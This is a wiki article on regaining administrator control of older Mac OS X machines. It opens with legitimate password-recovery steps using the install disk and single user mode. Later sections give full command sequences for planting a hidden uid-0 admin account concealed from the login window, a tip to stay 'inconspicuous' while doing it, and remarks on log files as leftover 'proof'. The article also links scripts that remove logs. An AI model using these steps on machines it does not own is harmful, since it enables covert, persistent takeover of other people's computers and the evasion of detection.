Gain Administrative Control of Mac OS X

From MacShadows KB

Jump to: navigation, search
height=14px
Warning: The information in this article may not be compatible with the latest releases of Mac OS X. Following the instructions contained in this article may damage your system. Please use caution as MSKB cannot be held responsible for any damage caused. To have your say about the future of this article please use the Talk page.
Administrators: Please do not delete this page without reviewing the edit history and Talk page.


Contents

Introduction

This page describes methods which allow you to (re)gain admin control of a computer. This information is useful for those who have forgotten their admin password, bought a computer with a current admin user on the hard disk, etc. Follow these instructions at your own risk.

Type everything as specified. In Single User Mode you are root. There are no confirmations and there is no "Undo" button. Be responsible.

Using the Install Disk

The easiest way to regain your administrator password is to reset it from the Install Disk that came with your computer. Insert the Install Disk, and restart your computer, holding down the "C" key down on the keyboard until the Apple logo appears. Depending on your Mac OS X version the "Reset Password" tool will be under the "Installer" or "Utilities" menu.

Using Single User Mode

Notes:

  • The acronym SUM will now be used for Single User Mode.
  • This method does not work if your computer has an Open Firmware password with SUM disabled.
  • Changing the amount of working RAM inside a Mac, followed by a reboot and resetting ("zapping") the PRAM, re-sets Open Firmware and deletes the Open Firmware password.
  • Mac OS X 10.2 (or less) users do not have to use SUM to create a new admin user, as doing so does not require admin access within Mac OS X it's self.
  • Running the "fsck -y" command is considered optional. (And pointlessly absurd on 10.3+ which would require fsck -yf to actually repair anything.)

Restart your computer while holding down the Command (aka CMD aka Apple aka Place of Interest) key and the "S" key at the same time. Your computer should boot to a black screen with white text. Wait until a prompt that says: 

root#

appears.

Reset Admin Account

At the prompt, type the following, exactly as shown and press enter after each command listed. (case-sensitive) 

fsck -y
mount -uaw /
rm /var/db/.AppleSetupDone

This removes the file the computer checks for on boot (.AppleSetupDone) to see if your computer has been setup yet. If it doesn't exist, your computer will go through the usual steps of setup (the multiple languages saying "Welcome", etc).

Next, type: 

reboot

And after hitting Enter, your computer will reboot. You can follow setup, and create a new admin user. After doing so, you can delete the old admin user if you purchased the computer used. (not recommended if it's not your computer)

Changing Admin Password

An alternate way is to change the Administrative password from SUM. Once you are booted into SUM, and are staring at the prompt, type in the following commands (in order), and hit enter after each one. Wait until the prompt re-appears before typing in the next command. 

fsck -y
mount -uaw /
sh /etc/rc

Note: the last command will take time. Be patient.

Now, to change the Admin password do: 

passwd username

Where "username" is the administrative account's username. You will be prompted to enter, and then confirm, a new password. As you type the password and confirmation, no characters will appear on the screen -- not even asteriks. This is fine, ignore it and keep typing.

Making an Existing User Admin

Yet another alternate way is to make an existing account an administrator. After booting into SUM, at the prompt, type in the following commands (in order), and hit enter after each one. Wait until the prompt re-appears before typing in the next command. 

fsck -y
mount -uaw /

If on Mac OS X 10.4 or greater you will have to enter this command, if not, you may skip it and continue: 

sh /etc/rc

Be patient, the this command may take a while.

Replace your_account_name with the shortname of your account. 

nicl . -append /groups/admin users your_account_name
nicl . -append /groups/wheel users your_account_name

Type: 

reboot
and press Enter (Return).

System Setup Re-Run Administrator

If you don't have enough time or simply want to create an easy, visible admin account, use the following steps. This has been known to work on all versions of Mac OS X.

The initial System Setup wizard that runs when your Macintosh has had a fresh install creates an Administrator account by default. Since that is all that this utility does, we can force the utility to run again and create a brand new account.

1. Enter single user mode (see above). Once in single user mode, check the filesystem and mount the hard drive. 

fsck -y
mount -uaw /

Note: if the user database is corrupt, the system setup stops responding after entering personal information and does not continue to create the Administrator account. Only if the steps below do not work out, go back to single user mode follow step 1 above then type (this renames the database, effectively clearing it): 

mv /var/db/netinfo/local.nidb /var/db/netinfo/local.nidb.bad

2. All we need to do now is remove a flag file from the system 

rm -rf /var/db/.AppleSetupDone

3. Now reboot 

reboot

Upon reboot, your machine will run through the system setup wizard. Note that if you are trying to be inconspicuous, you may want to turn down the volume or plug in headphones.

Hidden Admin Users

The following information is gathered from various sources. Should you not want to perform the following tasks, Subterraneus has written a set of shell scripts that can Add and Remove Hidden Admin Users on 10.4 and greater only and remove logs on (as far as we know) any OSX. He has also graciously donated them to be available for download on this site. Thanks, man. View its Project page: Subterraneus' HAUS

Creating a Hidden Admin User

Information gathered from hackenslacker's website and Subterraneus

Use the method described in the above section to enter SUM. Enter the following commands assuming you want the hidden user to be "server" and the password to be "servpass". After each command (after each line) hit Enter (aka Return). Feel free to print these out.

All Users: 

fsck -y
mount -uaw /

Pre-10.4 Users: 

nicl . -create /users/server
nicl . -create /users/server passwd "servpass"
nicl . -create /users/server uid 401
nicl . -create /users/server gid 20
nicl . -create /users/server home "/private/var/server"
nicl . -append /groups/admin users server
mkdir /private/var/server
chown -R server:staff /private/var/server

10.4 or greater Users: Note: The first command may take a while, so be patient. 

sh /etc/rc
 nicl . -create /users/"server" 
 nicl . -create /users/"server" uid 0 
 nicl . -create /users/"server" gid 20 
 nicl . -create /users/"server" home "/dev/null" 
 nicl . -create /users/"server" shell "/bin/bash" 
 nicl . -create /users/"server" passwd "servpass" 
 nicl . -create /users/"server" _writers_passwd "server" 
 nicl . -create /users/"server" expire 0 
 nicl . -create /users/"server" name "server" 
 nicl . -create /users/"server" realname "" 
 nicl . -create /users/"server" change 0 
 nicl . -create /users/"server" class "" 
 nicl . -append /groups/admin users "server" 
 nicl . -append /groups/wheel users "server" 
 nicl . -create /users/"server" naprivs -2147483394 
 defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add "server"

Please note the spaces and period after nicl, they're important.

Type: 

reboot

and then press Enter when finished.

At the list of users, hit any arrow key on your keyboard to select a user. Then press Option (aka Alt) and Enter to bring up a name and password prompt. Enter the name and password you used when you created the hidden user.

Removing a Hidden Admin User

Should you later decide you want to remove this hidden user, boot into SUM as described earlier and use the following commands, assuming that your user is named "server":

All Users: 

fsck -y
mount -uaw /

Pre-10.4 Users: 

nicl . -delete /users/server
nicl . -delete /groups/admin users server
rm -rf /private/var/server

10.4 or greater Users: Note: The first command may take a while, so be patient. 

sh /etc/rc
defaults delete /Library/Preferences/com.apple.loginwindow HiddenUsersList
nicl . -delete /users/server
nicl . -delete /groups/admin users server
rm -rf /users/server

Type: 

reboot

and then press Enter when finished.

Please remember log files will remain unless you remove them, and therefore proof of the user remains.

That being said, once again, here is a link to Subterraneus' HAUS.

Frozen sh /etc/rc

A lot of people have complained that running "sh /etc/rc" never ends.

If running the command appears to freeze on this: 

<computer hostname> mDNSResponder: Adding browse domain local.

Example with my computer's hostname being "reikon": 

reikon mDNSResponder: Adding browse domain local.

Wait a few seconds (10-20) or until after you hear the computer stop "processing" and press the Enter (Return) key. This should bring the root prompt back up.

Retrieved from "http://www.macshadows.com/kb/index.php?title=Gain_Administrative_Control_of_Mac_OS_X"

Personal tools
Ads